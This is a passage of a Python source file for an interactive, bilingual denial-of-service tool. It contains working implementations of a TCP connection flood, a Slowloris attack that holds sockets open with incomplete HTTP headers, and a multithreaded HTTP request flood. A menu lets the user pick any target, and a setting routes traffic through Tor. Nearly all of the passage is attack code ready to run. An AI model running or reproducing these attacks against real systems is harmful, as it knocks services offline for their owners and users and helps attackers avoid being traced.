message.encode() 617 | 618 | connections_active = 0 619 | lock = threading.Lock() 620 | 621 | def create_connection(conn_id): 622 | nonlocal connections_active 623 | try: 624 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 625 | s.settimeout(15) 626 | s.connect((target_ip, target_port)) 627 | 628 | with lock: 629 | connections_active += 1 630 | print(format_message(t.get('connection_established').format(conn_id, connections_active))) 631 | 632 | # Send data continuously 633 | packet_count = 0 634 | while packet_count < 100: # Send up to 100 messages per connection 635 | try: 636 | packet_msg = message + f" [Conn:{conn_id} Packet:{packet_count}]".encode() 637 | s.send(packet_msg) 638 | packet_count += 1 639 | time.sleep(0.3) 640 | except Exception as e: 641 | print(format_message(t.get('connection_error_send').format(conn_id, e))) 642 | break 643 | 644 | s.close() 645 | with lock: 646 | connections_active -= 1 647 | return True 648 | 649 | except Exception as e: 650 | print(format_message(t.get('connection_failed').format(conn_id, e))) 651 | return False 652 | 653 | print(format_message(t.get('establishing_connections').format(num_connections))) 654 | start_time = time.time() 655 | 656 | with ThreadPoolExecutor(max_workers=num_connections) as executor: 657 | results = list(executor.map(create_connection, range(1, num_connections + 1))) 658 | 659 | end_time = time.time() 660 | successful_connections = sum(results) 661 | 662 | print(f"\n{t.get('tcp_summary')}:") 663 | print(f"{t.get('successful_connections')}: {successful_connections}/{num_connections}") 664 | print(f"{t.get('total_time')}: {end_time - start_time:.2f} seconds") 665 | 666 | return successful_connections 667 | 668 | 669 | def slowloris_attack(target_url, num_sockets=150): 670 | """Enhanced Slowloris attack""" 671 | print(format_message(t.get('starting_slowloris').format(target_url))) 672 | 673 | # Parse URL 674 | if not target_url.startswith(('http://', 'https://')): 675 | target_url = 'http://' + target_url 676 | 677 | parsed = urlparse(target_url) 678 | host = parsed.hostname 679 | port = parsed.port or (443 if parsed.scheme == 'https' else 80) 680 | path = parsed.path or '/' 681 | 682 | sockets = [] 683 | print(format_message(t.get('configuring_sockets').format(num_sockets))) 684 | 685 | # Create sockets 686 | for i in range(num_sockets): 687 | try: 688 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 689 | s.settimeout(4) 690 | s.connect((host, port)) 691 | 692 | # Send incomplete headers 693 | headers = [ 694 | f"GET {path} HTTP/1.1\r\n", 695 | f"Host: {host}\r\n", 696 | "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n", 697 | "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n", 698 | "Content-Length: 1000000\r\n", 699 | "X-a: " 700 | ] 701 | 702 | for header in headers: 703 | s.send(header.encode()) 704 | time.sleep(0.1) 705 | 706 | sockets.append(s) 707 | if (i + 1) % 50 == 0: 708 | print(format_message(t.get('sockets_connected').format(i + 1, num_sockets))) 709 | 710 | except Exception as e: 711 | print(format_message(t.get('socket_error').format(i + 1, e))) 712 | break 713 | 714 | print(format_message(t.get('sockets_active').format(len(sockets)))) 715 | print(format_message(t.get('press_stop'))) 716 | 717 | try: 718 | cycle = 0 719 | while sockets and cycle < 1000: 720 | cycle += 1 721 | active_sockets = len(sockets) 722 | 723 | for i, s in enumerate(sockets[:]): 724 | try: 725 | # Send additional header every 15 seconds 726 | s.send(f"b\r\n".encode()) 727 | time.sleep(15) 728 | except Exception as e: 729 | sockets.remove(s) 730 | try: 731 | s.close() 732 | except: 733 | pass 734 | 735 | if active_sockets != len(sockets): 736 | print(format_message(t.get('sockets_active_count').format(len(sockets), num_sockets))) 737 | 738 | if not sockets: 739 | print(format_message(t.get('all_sockets_closed'))) 740 | break 741 | 742 | except KeyboardInterrupt: 743 | print(f"\n{t.get('attack_stopped')}") 744 | finally: 745 | # Close all sockets 746 | for s in sockets: 747 | try: 748 | s.close() 749 | except: 750 | pass 751 | print(format_message(t.get('sockets_closed').format(len(sockets)))) 752 | 753 | 754 | def ddos_attack(target_url, duration=60): 755 | """Simulated DDoS attack with multiple techniques""" 756 | print(format_message(t.get('starting_ddos').format(target_url, duration))) 757 | 758 | if not target_url.startswith(('http://', 'https://')): 759 | target_url = 'http://' + target_url 760 | 761 | parsed = urlparse(target_url) 762 | host = parsed.hostname 763 | 764 | stop_attack = False 765 | requests_sent = 0 766 | 767 | def attack_worker(worker_id): 768 | nonlocal requests_sent 769 | user_agents = [ 770 | 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 771 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36', 772 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36' 773 | ] 774 | 775 | while not stop_attack: 776 | try: 777 | headers = { 778 | 'User-Agent': random.choice(user_agents), 779 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' 780 | } 781 | 782 | response = requests.get(target_url, headers=headers, timeout=5, verify=False) 783 | requests_sent += 1 784 | if requests_sent % 100 == 0: 785 | print(format_message(t.get('worker_progress').format(worker_id, requests_sent))) 786 | 787 | except Exception: 788 | pass 789 | 790 | print(format_message(t.get('starting_workers'))) 791 | start_time = time.time() 792 | 793 | # Start workers 794 | workers = [] 795 | for i in range(10): 796 | worker = threading.Thread(target=attack_worker, args=(i + 1,)) 797 | worker.daemon = True 798 | worker.start() 799 | workers.append(worker) 800 | 801 | # Execute for specified time 802 | try: 803 | while time.time() - start_time < duration: 804 | time.sleep(1) 805 | elapsed = time.time() - start_time 806 | print(format_message( 807 | t.get('time_elapsed').format(int(elapsed), requests_sent, f"{requests_sent / elapsed:.1f}"))) 808 | except KeyboardInterrupt: 809 | print(f"\n{t.get('attack_interrupted')}") 810 | 811 | stop_attack = True 812 | end_time = time.time() 813 | 814 | print(f"\n{t.get('ddos_summary')}:") 815 | print(f"{t.get('total_requests')}: {requests_sent}") 816 | print(f"{t.get('total_time')}: {end_time - start_time:.2f} seconds") 817 | print(f"{t.get('requests_second')}: {requests_sent / (end_time - start_time):.2f}") 818 | 819 | 820 | def interactive_mode(): 821 | """Modo interactivo con menú.""" 822 | # Mostrar el banner 823 | print_banner() 824 | 825 | # Seleccionar idioma al inicio 826 | get_language_selection() 827 | 828 | # Limpiar pantalla y volver a mostrar el banner con el idioma seleccionado 829 | os.system('clear' if os.name == 'posix' else 'cls') 830 | print_banner() 831 | 832 | # Solicitar objetivo 833 | target = input(f"{t.get('enter_target')}: ").strip() 834 | if not target: 835 | print(t.get('error_no_target')) 836 | return 837 | 838 | # Mostrar menú de opciones 839 | print("\n" + t.get('select_attack')) 840 | print("1. " + t.get('port_scan')) 841 | print("2. " + t.get('http_flood')) 842 | print("3. " + t.get('tcp_flood')) 843 | print("4. " + t.get('slowloris')) 844 | print("5. " + t.get('ddos_sim')) 845 | 846 | choice = input(f"\n{t.get('option')}: ").strip() 847 | 848 | try: 849 | if choice == '1': 850 | start_port = int(input(f"{t.get('start_port')}: ") or 1) 851 | end_port = int(input(f"{t.get('end_port')}: ") or 1000) 852 | open_ports = port_scan(target, start_port, end_port) 853 | print(f"\n{t.get('result').format(len(open_ports), open_ports)}") 854 | 855 | elif choice == '2': 856 | num_requests = int(input(f"{t.get('num_requests')}: ")) 857 | delay = float(input(f"{t.get('delay')}: ") or 0.1) 858 | http_flood(target, num_requests, delay) 859 | 860 | elif choice == '3': 861 | port = int(input(f"{t.get('target_port')}: ")) 862 | num_conn = int(input(f"{t.get('num_connections')}: ")) 863 | message = input(f"{t.get('message')}: ") 864 | tcp_flood(target, port, num_conn, message) 865 | 866 | elif choice == '4': 867 | num_sockets = int(input(f"{t.get('num_sockets')}: ") or 150) 868 | slowloris_attack(target, num_sockets) 869 | 870 | elif choice == '5': 871 | duration = int(input(f"{t.get('duration')}: ") or 60) 872 | ddos_attack(target, duration) 873 | 874 | else: 875 | print(t.get('error_invalid_option')) 876 | 877 | except KeyboardInterrupt: 878 | print(f"\n{t.get('operation_cancelled')}") 879 | except Exception as e: 880 | print(f"{t.get('error_general')}: {e}") 881 | 882 | # Preguntar si desea reiniciar 883 | answer = input(f"\n{t.get('restart')}: ").strip().lower() 884 | if answer in ['s', 'si', 'y', 'yes']: 885 | restart_program() 886 | else: 887 | print(t.get('exiting')) 888 | 889 | def main(): 890 | """Función principal con menú interactivo.""" 891 | # Cargar configuración 892 | Config.load_config() 893 | 894 | # Mostrar banner 895 | print_banner() 896 | 897 | # Seleccionar idioma al inicio 898 | get_language_selection() 899 | 900 | # Limpiar pantalla y volver a mostrar el banner con el idioma seleccionado 901 | os.system('clear' if os.name == 'posix' else 'cls') 902 | print_banner() 903 | 904 | while True: 905 | try: 906 | # Mostrar menú principal 907 | print("\n=== " + t.get('main_menu') + " ===") 908 | print("1. " + t.get('port_scan')) 909 | print("2. " + t.get('http_flood')) 910 | print("3. " + t.get('tcp_flood')) 911 | print("4. " + t.get('slowloris')) 912 | print("5. " + t.get('ddos_sim')) 913 | print("6. " + t.get('settings_title')) 914 | print("0. " + t.get('exit')) 915 | 916 | opcion = input("\n>> ").strip() 917 | 918 | if opcion == '0': 919 | print(f"\n{t.get('exiting')}") 920 | break 921 | 922 | elif opcion == '1': 923 | # Escaneo de puertos 924 | print("\n=== " + t.get('port_scan_title') + " ===") 925 | target = input(t.get('enter_ip_or_domain') + " ").strip() 926 | start_port = input(t.get('start_port_prompt') + " ").strip() or "1" 927 | end_port = input(t.get('end_port_prompt') + " ").strip() or "1000" 928 | 929 | try: 930 | open_ports = port_scan(target, int(start_port), int(end_port)) 931 | print("\n[+] " + t.get('scan_completed').format(open_ports)) 932 | except Exception as e: 933 | print(f"[!] Error: {e}") 934 | 935 | elif opcion == '2': 936 | # HTTP Flood 937 | print("\n=== " + t.get('http_flood_title') + " ===") 938 | target = input(t.get('enter_url') + " ").strip() 939 | num_requests = input(t.get('num_requests_prompt') + " ").strip() 940 | delay = input(t.get('delay_prompt') + " ").strip() or "0.1" 941 | 942 | try: 943 | print("\n[+] " + t.get('starting_attack').format(target)) 944 | http_flood(target, int(num_requests), float(delay)) 945 | except Exception as e: 946 | print(f"[!] Error: {e}") 947 | 948 | elif opcion == '3': 949 | # TCP Flood 950 | print("\n=== " + t.get('tcp_flood_title') + " ===") 951 | target = input(t.get('enter_ip') + " ").strip() 952 | port = input(t.get('port_prompt') + " ").strip() 953 | num_conn = input(t.get('num_connections_prompt') + " ").strip() 954 | message = input(t.get('message_prompt') + " ").strip() or "X" * 1024 955 | 956 | try: 957 | print("\n[+] " + t.get('starting_tcp_flood').format(target, port)) 958 | tcp_flood(target, int(port), int(num_conn), message) 959 | except Exception as e: 960 | print(f"[!] Error: {e}") 961 | 962 | elif opcion == '4': 963 | # Slowloris 964 | print("\n=== " + t.get('slowloris_title') + " ===") 965 | target = input(t.get('enter_url') + " ").strip() 966 | num_sockets = input(t.get('num_sockets_prompt') + " ").strip() or "150" 967 | 968 | try: 969 | print("\n[+] " + t.get('starting_attack').format(target)) 970 | slowloris_attack(target, int(num_sockets)) 971 | except Exception as e: 972 | print(f"[!] Error: {e}") 973 | 974 | elif opcion == '5': 975 | # DDoS 976 | print("\n=== " + t.get('ddos_title') + " ===") 977 | target = input(t.get('enter_url') + " ").strip() 978 | duration = input(t.get('duration_prompt') + " ").strip() or "60" 979 | 980 | try: 981 | print("\n[+] " + t.get('starting_attack').format(target)) 982 | ddos_attack(target, int(duration)) 983 | except Exception as e: 984 | print(f"[!] Error: {e}") 985 | 986 | elif opcion == '6': 987 | # Configuración 988 | while True: 989 | print(f"\n=== {t.get('settings_title')} ===") 990 | print(f"1. {t.get('current_language')}: {t.get(Config.LANGUAGE)}") 991 | print(f"2. {t.get('use_tor')}: {t.get('yes' if Config.USE_TOR else 'no')}") 992 | print(f"0. {t.get('back_to_menu')}") 993 | 994 | config_opcion = input(f"\n{t.get('select_option')} >> ").strip() 995 | 996 | if config_opcion == '0': 997 | break 998 | 999 | elif config_opcion == '1': 1000 | get_language_selection() 1001 | break # El programa se reiniciará, pero por si acaso 1002 | 1003 | elif config_opcion == '2': 1004 | Config.USE_TOR = not Config.USE_TOR 1005 | print(f"Tor {t.get('enabled' if Config.USE_TOR else 'disabled')}") 1006 | 1007 | else: 1008 | print(t.get('invalid_option')) 1009 | 1010 | print("\n[!] " + t.get('error_invalid_option')) 1011 | 1012 | except KeyboardInterrupt: 1013 | print("\n[!] " + t.get('operation_cancelled')) 1014 | continue 1015 | except Exception as e: 1016 | print("\n[!] " + t.get('error_general') + ": " + str(e)) 1017 | continue 1018 | 1019 | if __name__ == "__main__": # No me gusta eliminar los comentarios 1020 | try: 1021 | main() 1022 | except KeyboardInterrupt: 1023 | print("\n[!] " + t.get('operation_cancelled')) 1024 | print("\n[!] " + t.get('app_terminated')) 1025 | sys.exit(0) 1026 | except Exception as e: 1027 | print("[!] " + t.get('critical_error') + ": " + str(e)) 1028 | sys.exit(1) 1029 | --------------------------------------------------------------------------------